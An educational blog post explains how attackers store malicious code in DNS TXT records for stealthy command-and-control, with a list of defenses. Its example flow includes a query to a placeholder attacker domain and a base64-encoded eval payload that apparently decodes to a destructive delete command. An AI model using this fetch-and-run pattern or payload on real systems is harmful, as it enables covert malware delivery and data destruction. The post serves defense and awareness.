 |
Cybercriminals are exploiting DNS records to hide and distribute malicious code, evading traditional security systems. This innovative technique transforms an essential Internet service into a stealth channel (a means of communication that uses seemingly innocuous or legitimate protocols—in this case, the DNS—to camouflage the traffic.
for command, control, and malware updates.๐ค Do you know anything about malware in DNS?
Yes, DNS (Domain Name System) have long been exploited by cybercriminals. Popular techniques include DNS tunneling, DNS hijacking, and the use of automatically generated domains (DGA). But today we're witnessing a new, more subtle evolution: the use of DNS records as repositories for malicious code.
๐คจ But in what sense do “DNS contain malware”?
It seems that cybercriminals are turning DNS records into repositories for malicious code. In particular, they exploit the fact that DNS records — such as TXT records — can contain arbitrary, even very long, text strings. This data is then read by malware already present on infected systems.
The trick is simple and ingenious: hide malicious scripts, configurations, or commands inside an infrastructure that no one fully controls, exploiting an essential service like DNS.
๐คจ So wait… this type of attack assumes that malware is already installed on the PC?
Exactly. DNS itself cannot execute code. It is only a name resolution protocol.
To exploit malicious data in DNS records, we deThere must be a component already active on the machine (e.g., malware, a script, a macro, a PowerShell agent) that:
-
Query a specific domain controlled by the attacker.
-
Read the content (e.g., from a TXT record).
-
Decrypt and executes the code in memory.
๐คท♂️ So why use DNS? If the malware is already installed, couldn't it already be doing damage?
Key question. In fact, installed malware can do anything.
But using them via DNS offers enormous strategic advantages for the attacker ⬇️
๐ฏ Why use DNS even after infection?
| Advantage | Explanation |
|---|---|
| ๐ต️♂️ Processing detection | DNS traffic is rarely monitored, unlike HTTP/S or FTP. Queries appear harmless. |
| ๐ Modularity | The initial malware may be just a loader. The actual malicious components are downloaded "piecemeal" via DNS. |
| ๐ป Fileless | Payloads can be executed entirely in memory, leaving no traces on disk. |
| ๐ฎ Remote Control (C2) | Commands arrive via DNS responses (e.g., in TXT records) and are interpreted locally. |
| ๐งช Antivirus signatures bypassed | DNS data can be encrypted, base64 encoded, or fragmented. No standard signature intercepts them. |
๐ A practical example?
Here is a simplified flow:
-
Malware executed via phishing or exploits installs itself as a loader.
-
Does a DNS query to
config.attacker-domain.com. -
The returned TXT record contains an encoded string:
eval(base64_decode("c3lzdGVtKCJjbWQuZXhlIC9jIFwiZGVsZXRlIC9GICpcIg==")) -
The malware decodes it and runs it in PowerShell or Python.
-
The system is further compromised, but without downloading anything over HTTP/S.
๐ก️ How do you defend against it?
Defending against this technique requires behavioral analysis and DNS visibility. Some countermeasures:
-
Monitor unusual DNS records (e.g., TXTs that are too long, suspicious encodings).
-
Limit outgoing DNS requests to unauthorized domains.
-
DNS firewall with threat intelligence (e.g., Quad9, Cisco Umbrella, Cloudflare Gateway).
-
EDR/IDS with deep DNS inspection (e.g., Suricata, Zeek).
-
DNS-oriented threat hunting, examining anomalous DNS requests.
๐งต Conclusion
DNS is no longer just for resolving domain names.Now They are also malicious command and data transport channels, invisible to traditional systems.
This makes it essential to integrate DNS traffic into the corporate security plan and treat it as a potential attack vector, not just as an infrastructure service.
Follow me #techelopment
Official site: www.techelopment.it
facebook: Techelopment
instagram: @techelopment
X: techelopment
Bluesky: @techelopment
telegram: @techelopment_channel
whatsapp: Techelopment
youtube: @techelopment
